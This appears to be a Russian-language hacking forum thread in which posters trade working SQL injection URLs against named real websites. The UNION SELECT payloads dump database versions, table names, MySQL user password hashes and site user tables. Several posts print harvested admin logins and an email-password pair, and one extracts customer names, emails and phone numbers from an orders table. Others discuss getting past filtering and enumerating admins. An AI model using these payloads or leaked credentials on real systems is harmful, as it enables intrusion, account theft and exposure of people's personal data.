Code: http://town-of-masters.spb.ru/main.php?enter=cat&tovid=-1+union+select+1,concat(database(),char(58),user(),char(58),version()),3/* http://town-of-masters.spb.ru/main.php?enter=cat&tovid=-1+union+select+1,table_name,3+from+information_schema.tables+limit+37,1/* http://town-of-masters.spb.ru/main.php?enter=cat&tovid=-1+union+select+1,concat(id,char(58),namek,char(58),t),3+from+tom_tabless+limit+0,1/*
http://www.photostars.ru/news/event.htm?id=63'+union+select+1,2,3,4,concat(user,char(58),password),6,7+from+mysql.user/* прокручиваем в самый низ
Code: http://www.latinoreview.com/news.php?id=-1369'+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,user(),database()/*
Code: http://www.arabmonitor.info/news/dettaglio.php?idnews=-7070+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+users/* Code: http://www.crenos.it/news/singnews.php?idnews=-28+union+select+1,password,3,4,5,6,7,8,9,10+from+mysql.user/* хмм, страно =\ не могу вывести юзверя, зы: много пивка выпил наверно =)
www.sport.is Code: http://www.sport.is/fullfrettir.php?idnews=-4936+union+select+1,2,concat(name,0x3a,password),4+from+users/*&idcat=10 admin:markme
www.daoiststudies.org Code: http://www.daoiststudies.org/scholars.php?cmd=list&userid=-863+union+select+1,concat(email,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+members/* [email protected]:queriooz2
=\\ http://www.kuraraydental.com/ Inj: Админку не искал. Погонять по лимиту, можно выцепить других юзеров. admin:chris-ko
Code: http://www.realhit.ru/?page=news&id=-1+union+select+null,version(),null/* http://www.realhit.ru/?page=news&id=-1+union+select+null,database(),null/* http://www.realhit.ru/?page=news&id=-1+union+select+null,user(),null/*
У меня всё прекрасно выводит: Code: _http://www.marycoughlanmusic.com/shop.php?id=-4+UNION+SELECT+1,2,USER(),4,version(),database(),7,8,9,10,11,12/* Но как только обращаешься к таблице, то пусто. Какая-то хитрая фильтрация. Кто знает что здесь сделать? Оч. Интересно.
mafiaclub.ru Code: http://www.mafiaclub.ru/gallery/user.php?gid=-1+union+select+1,2,3,concat(username,0x3a,user_password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+bb_users+limit+1,1/* phpbb хеш админа там 5 админов, перебор лимитами.
Code: http://www.atlasaerospace.net/newsi-r.htm?id=-1+union+select+1,2,3,concat(database(),char(58),user(),char(58),version()),5,6,7/* http://www.atlasaerospace.net/newsi-r.htm?id=-1+union+select+1,2,3,4,5,6,7+from+orders/* http://www.atlasaerospace.net/newsi-r.htm?id=-1+union+select+1,2,3,concat(name,char(58),email,char(58),phone),5,6,7+from+orders/*
Code: http://pride.uoregon.edu/section.php?id=-1+union+select+1,user(),2,3,4,5/* http://pride.uoregon.edu/section.php?id=-1+union+select+1,user(),2,3,4,5/* http://pride.uoregon.edu/section.php?id=-1+union+select+1,user(),2,3,4,5/*
Территория =============== www.it-territory.ru =============== Code: http://www.it-territory.ru./index.php?obj=press&id=136+union+select+1,version(),3,4/* Список статей, самый низ Кто достанет нам новый апдейт Территории?